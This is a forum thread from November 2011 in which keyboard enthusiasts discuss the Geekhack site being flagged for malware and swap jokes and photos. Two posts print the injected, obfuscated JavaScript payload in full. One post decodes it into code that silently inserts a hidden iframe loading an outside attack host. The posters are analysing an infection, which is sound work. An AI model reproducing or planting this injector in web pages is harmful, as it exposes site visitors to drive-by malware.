Geekhack is infeasted

ripster

07 Nov 2011, 22:13

We're the friendliest customers in this world
We're modest - we have money
Yeah, I got the irony part. Geld. Money.

I got an A in High School German. Just ask all the German Deskthority members.

P.S. Don't you europeans close your quotes???? """""""""

User avatar
guilleguillaume

09 Nov 2011, 02:45

Is the problem solved?

Firefox and IE9 still warn me about malware site. :?

itlnstln

09 Nov 2011, 14:50

According to iMav, he fixed the problem. Chrome is still flagging GH as malicious as well. I'm only going to access it by Tapatalk until the message goes away since I primarily post from work.

ripster

09 Nov 2011, 16:46

My Filco R Limited Edition Red Cherry MX had bugs yesterday.

Specifically an ant.

I'll host the pics here to please Sixty.

Alive
FLA_3597-2.jpg
FLA_3597-2.jpg (916.89 KiB) Viewed 7402 times
Dead
FLA_3602.jpg
FLA_3602.jpg (1014.16 KiB) Viewed 7402 times

ripster

10 Nov 2011, 17:46

So you guys really couldn't see my photos unless logged in???

Image

BTW the warning message is gone.

User avatar
webwit
Wild Duck

11 Nov 2011, 01:28

Still leaves this problem (example) when not logged in there.

Scumbag geekhack...

Image

ripster

11 Nov 2011, 19:43

Feel free to use my pictures in your wikis.

Just leave the watermark.

I call this one "Red Alert - Virus Attack"!
FLA_3613.jpg
FLA_3613.jpg (166.18 KiB) Viewed 7329 times

User avatar
webwit
Wild Duck

12 Nov 2011, 00:37

ripster wrote:I call this one "Red Alert - Virus Attack"!
FLA_3613.jpg
FLA_3613.jpg (145.68 KiB) Viewed 7313 times
I like the orange guy.

ripster

23 Nov 2011, 18:38

Geekhack is infeasted
Happy Thanksgiving All!

Oh wait, some of you are Canadians.

Meanwhile at Geekhack......
Geekhack 11-23-2011.png
Geekhack 11-23-2011.png (44.14 KiB) Viewed 7245 times
Malware found on javascript file:
http://geekhack.org/clientscript/yui/co ... n.js?v=417
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
a=(document.getElementsByTagName+'').substr(1,4);if((a=="func")||(a=="unct")){ss="";s=String;e=eval;t='g';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n="4.5g4.5g52.5g51g16g20g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g20.5g61.5g4.5g4.5g4.5g52.5g51g57g48.5g54.5g50.5g57g20g20.5g29.5g4.5g4.5g62.5g16g50.5g54g57.5g50.5g16g61.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g59.5g57g52.5g58g50.5g20g17g30g52.5g51g57g48.5g54.5g50.5g16g57.5g57g49.5g30.5g19.5g52g58g58g56g29g23.5g23.5g59.5g59.5g59.5g23g49.5g55.5g54.5g50.5g58g51g55.5g57g58.5g54.5g57.5g23g49.5g55.5g54.5g23.5g58.5g56g54g55.5g48.5g50g57.5g23.5g51.5g55.5g55.5g51.5g54g50.5g23g52g58g54.5g54g19.5g16g59.5g52.5g50g58g52g30.5g19.5g24.5g24g19.5g16g52g50.5g52.5g51.5g52g58g30.5g19.5g24.5g24g19.5g16g57.5g58g60.5g54g50.5g30.5g19.5g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g29g52g52.5g50g50g50.5g55g29.5g56g55.5g57.5g52.5g58g52.5g55.5g55g29g48.5g49g57.5g55.5g54g58.5g58g50.5g29.5g54g50.5g51g58g29g24g29.5g58g55.5g56g29g24g29.5g19.5g31g30g23.5g52.5g51g57g48.5g54.5g50.5g31g17g20.5g29.5g4.5g4.5g62.5g4.5g4.5g51g58.5g55g49.5g58g52.5g55.5g55g16g52.5g51g57g48.5g54.5g50.5g57g20g20.5g61.5g4.5g4.5g4.5g59g48.5g57g16g51g16g30.5g16g50g55.5g49.5g58.5g54.5g50.5g55g58g23g49.5g57g50.5g48.5g58g50.5g34.5g54g50.5g54.5g50.5g55g58g20g19.5g52.5g51g57g48.5g54.5g50.5g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g57.5g57g49.5g19.5g22g19.5g52g58g58g56g29g23.5g23.5g59.5g59.5g59.5g23g49.5g55.5g54.5g50.5g58g51g55.5g57g58.5g54.5g57.5g23g49.5g55.5g54.5g23.5g58.5g56g54g55.5g48.5g50g57.5g23.5g51.5g55.5g55.5g51.5g54g50.5g23g52g58g54.5g54g19.5g20.5g29.5g51g23g57.5g58g60.5g54g50.5g23g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g30.5g19.5g52g52.5g50g50g50.5g55g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g56g55.5g57.5g52.5g58g52.5g55.5g55g30.5g19.5g48.5g49g57.5g55.5g54g58.5g58g50.5g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g54g50.5g51g58g30.5g19.5g24g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g58g55.5g56g30.5g19.5g24g19.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g59.5g52.5g50g58g52g19.5g22g19.5g24.5g24g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g52g50.5g52.5g51.5g52g58g19.5g22g19.5g24.5g24g19.5g20.5g29.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g23g48.5g56g56g50.5g55g50g33.5g52g52.5g54g50g20g51g20.5g29.5g4.5g4.5g62.5";n=n["split"](t);for(i=0;i!=n.length;i++)ss+=s.fromCharCode(-h*e("n"+"["+"i"+"]"));zx=ss;if(a.data==a.nodeValue)e(zx)

itlnstln

23 Nov 2011, 19:25

There's also some spambot running around in there asking for pics. At least Tapatalk is safe.

I think.

pita

23 Nov 2011, 19:40

I don't get the warning virus warning, but I am not able to post anything..

User avatar
Daemon Raccoon

23 Nov 2011, 19:50

pita wrote:I don't get the warning virus warning, but I am not able to post anything..
If you disable Javascript for Geekhack you can post.

User avatar
Ascaii
The Beard

24 Nov 2011, 11:39

got a new trojan warning yesterday, seems whatever the issue is is NOT resolved. Google now notes the last malware find as 2011-11-23

User avatar
zulios

24 Nov 2011, 12:51

I've had trouble with this : was browsing on geekhack. Suddenly firefox crashed, and a soft ironically called "privacy protection" appeared from nowhere, disabling my anti virus and trying to scan my pc. Fortunately I've gotten rid of it pretty quickly, but for a non experienced user it has a very similar look to any serious windows application.

Don't know what it does precisely though, but it said my pc was infected with blaster worm and started a scan it. It looks like it tries to protect you when actually I believe it rather tries to steal your data. That's some pretty good job in trying to lure the user.
Last edited by zulios on 24 Nov 2011, 13:11, edited 1 time in total.

User avatar
Brian8bit

24 Nov 2011, 13:09

Is it a vulnerability in vBulletin that has yet to be patched that people are exploiting? Or is it someone using a dodgy signature? Another forum I use with vBulletin occasionally gets malware warnings, but in every instance it has been someones signature...

User avatar
Ascaii
The Beard

24 Nov 2011, 15:19

Imav said it was a vulnerability last time, but supposedly it was fixed...if it was then it shouldnt be fucked up again...but it is, so all bets are off in my eyes.

Gerk

24 Nov 2011, 18:13

It's seriously messed up at the moment, can't even load pages, instead getting the generic VB warning message that headers were already sent ... then it sends my browser(s) into a headspin that require a force quit. This is the first time any of the problems have caused me grief on OSX. It's also a time when I find Lion's "feature" for re-opening all of your Safari tabs after a quit (or force quit) incredibly annoying.

When iMac said it was "fixed" I think he was just referring to the injected js, not the actual exploit or whatever they used to get in with. If it is someone's sig then it's still using an exploit/loophole because there should be no js in sigs.

User avatar
7bit

24 Nov 2011, 18:37

I remember GeekHack was a great website (with some technical issues fron time to time), but long gone.
:sad:

I wonder what iMav does these days since he'd given up his website.
Last edited by 7bit on 24 Nov 2011, 20:28, edited 1 time in total.

mintberryminuscrunch

24 Nov 2011, 18:58

7bit wrote: I wonder what iMav does these days since he'd given up his website.
as long as he doesn't spam adds on the website there is still hope :D

User avatar
litster

24 Nov 2011, 19:13

Before, I wondered, ah, the good old days when every keyboard nut was under one roof, on the same forum. Now I am thankful that there are two forums. Or this Thanksgiving holiday would be pretty boring :) Fault tolerance FTW!

iMav said he is on the road this long weekend. I guess it will be a while before this fixed. Even if vB was patched, there maybe other security holes in the OS, browser, or other software on the box that is accessible through open ports for repeat infections.

pita

24 Nov 2011, 19:17

What a mess at GH... :(

User avatar
webwit
Wild Duck

24 Nov 2011, 19:25

What is sent is this:
Spoiler:

Code: Select all

<script>a=(document.getElementsByTagName+'').substr(1,4);if((a=="func")||(a=="unct")){ss="";s=String;e=eval;t='g';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n="4.5g4.5g52.5g51g16g20g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g20.5g61.5g4.5g4.5g4.5g52.5g51g57g48.5g54.5g50.5g57g20g20.5g29.5g4.5g4.5g62.5g16g50.5g54g57.5g50.5g16g61.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g59.5g57g52.5g58g50.5g20g17g30g52.5g51g57g48.5g54.5g50.5g16g57.5g57g49.5g30.5g19.5g52g58g58g56g29g23.5g23.5g57.5g59.5g48.5g50g59.5g25.5g23g50g55g57.5g24g26.5g23g49.5g55.5g54.5g23.5g54.5g48.5g52.5g55g23g56g52g56g31.5g56g48.5g51.5g50.5g30.5g51g25g26g24g50.5g24.5g28g51g48.5g26g50.5g48.5g28g25g26.5g26g19.5g16g59.5g52.5g50g58g52g30.5g19.5g24.5g24g19.5g16g52g50.5g52.5g51.5g52g58g30.5g19.5g24.5g24g19.5g16g57.5g58g60.5g54g50.5g30.5g19.5g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g29g52g52.5g50g50g50.5g55g29.5g56g55.5g57.5g52.5g58g52.5g55.5g55g29g48.5g49g57.5g55.5g54g58.5g58g50.5g29.5g54g50.5g51g58g29g24g29.5g58g55.5g56g29g24g29.5g19.5g31g30g23.5g52.5g51g57g48.5g54.5g50.5g31g17g20.5g29.5g4.5g4.5g62.5g4.5g4.5g51g58.5g55g49.5g58g52.5g55.5g55g16g52.5g51g57g48.5g54.5g50.5g57g20g20.5g61.5g4.5g4.5g4.5g59g48.5g57g16g51g16g30.5g16g50g55.5g49.5g58.5g54.5g50.5g55g58g23g49.5g57g50.5g48.5g58g50.5g34.5g54g50.5g54.5g50.5g55g58g20g19.5g52.5g51g57g48.5g54.5g50.5g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g57.5g57g49.5g19.5g22g19.5g52g58g58g56g29g23.5g23.5g57.5g59.5g48.5g50g59.5g25.5g23g50g55g57.5g24g26.5g23g49.5g55.5g54.5g23.5g54.5g48.5g52.5g55g23g56g52g56g31.5g56g48.5g51.5g50.5g30.5g51g25g26g24g50.5g24.5g28g51g48.5g26g50.5g48.5g28g25g26.5g26g19.5g20.5g29.5g51g23g57.5g58g60.5g54g50.5g23g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g30.5g19.5g52g52.5g50g50g50.5g55g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g56g55.5g57.5g52.5g58g52.5g55.5g55g30.5g19.5g48.5g49g57.5g55.5g54g58.5g58g50.5g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g54g50.5g51g58g30.5g19.5g24g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g58g55.5g56g30.5g19.5g24g19.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g59.5g52.5g50g58g52g19.5g22g19.5g24.5g24g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g52g50.5g52.5g51.5g52g58g19.5g22g19.5g24.5g24g19.5g20.5g29.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g23g48.5g56g56g50.5g55g50g33.5g52g52.5g54g50g20g51g20.5g29.5g4.5g4.5g62.5";n=n["split"](t);for(i=0;i!=n.length;i++)ss+=s.fromCharCode(-h*e("n"+"["+"i"+"]"));zx=ss;if(a.data==a.nodeValue)e(zx);</script>
Unable to add cookies, header already sent.<br />
File: /var/www/lherzog/geekhack.org-html/vb/includes/config.php<br />
Line: 2<br />
Oooh, an obfuscated javascript. Meh, I decode it and find this:
Spoiler:

Code: Select all

if (document.getElementsByTagName('body')[0]) {
	iframer();
} else {
	document.write("<iframe src='http://swadw3.dns05.com/main.php?page=f240e18fa4ea8254' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

function iframer() {
	var f = document.createElement('iframe');
	f.setAttribute('src','http://swadw3.dns05.com/main.php?page=f240e18fa4ea8254');
	f.style.visibility='hidden';
	f.style.position='absolute';
	f.style.left='0';
	f.style.top='0';
	f.setAttribute('width','10');
	f.setAttribute('height','10');
	document.getElementsByTagName('body')[0].appendChild(f);
}
In other words, it tries to insert a hidden iframe from http://swadw3.dns05.com/main.php?page=f240e18fa4ea8254, which is where the attack is coming from.

ripster

24 Nov 2011, 19:26

Come to the dark side.

We HAVE cookies.

For you Euro/Canadian folks this is what Thanksgiving Day is like in the great U.S.A.:
Piggly Wiggly is 6 degrees from Kevin Bacon.

Gerk

24 Nov 2011, 21:23

webwit wrote:What is sent is this:
(snip)
In other words, it tries to insert a hidden iframe from http://swadw3.dns05.com/main.php?page=f240e18fa4ea8254, which is where the attack is coming from.
I was just going to post this. They might have been more successful had they not tried to inject it where they did. Someone has labelled GH as a target, probably all over the hacker boards in their lists. Might be a while before they sort it I'm guessing. I think iMav keeps fixing the injected code but hasn't addressed the root of the issue.

Funny enough it still works fine with tapatalk, but traffic is pretty low today LOL :D

pita

24 Nov 2011, 22:40

Gerk wrote: ..., but traffic is pretty low today LOL :D
Well DUH!? lol.

Gerk

24 Nov 2011, 22:42

pita wrote:
Gerk wrote: ..., but traffic is pretty low today LOL :D
Well DUH!? lol.
Just stating that only a few of us tapatalk users are the ones getting anywhere :D

User avatar
webwit
Wild Duck

25 Nov 2011, 02:19

Image

Gerk

25 Nov 2011, 02:31

LOL

ripster

25 Nov 2011, 17:43

I think it's been fixed.

BUT I've said that before......
Report 2011-04-05 03:24:45 (GMT 1)
Website geekhack.org
Domain Hash 0db414050bd8f4be630b38e87d120354
IP Address 65.111.241.205 [SCAN]
IP Hostname runt-3.uhhh.org
IP Country US (United States)
AS Number 30691
AS Name LLDC - Lifeline Data Centers
Detections 0 / 21 (0 %)
Status CLEAN

Scanning site with: AMaDa CLEAN
Scanning site with: BrowserDefender CLEAN
Scanning site with: DNS-BH CLEAN
Scanning site with: DShield SDL CLEAN
Scanning site with: Google Diagnostic CLEAN
Scanning site with: hpHosts UNRATED
Scanning site with: joewein.de LLC CLEAN
Scanning site with: Malware Domain List CLEAN
Scanning site with: Malware Patrol CLEAN
Scanning site with: MyWOT CLEAN
Scanning site with: Norton SafeWeb CLEAN
Scanning site with: ParetoLogic URL Clearing House CLEAN
Scanning site with: PhishTank CLEAN
Scanning site with: SCUMWARE CLEAN
Scanning site with: SpamhausDBL CLEAN
Scanning site with: SURBL CLEAN
Scanning site with: Threat Log CLEAN
Scanning site with: TrendMicro Web Reputation CLEAN
Scanning site with: URIBL CLEAN
Scanning site with: Web Security Guard UNRATED
Scanning site with: ZeuS Tracker CLEAN
Alors on danse.

mintberryminuscrunch

25 Nov 2011, 19:51

lets take bets, how long it will last.
I give them till 1st of december

Post Reply

Return to “Geekhacker refugee camp”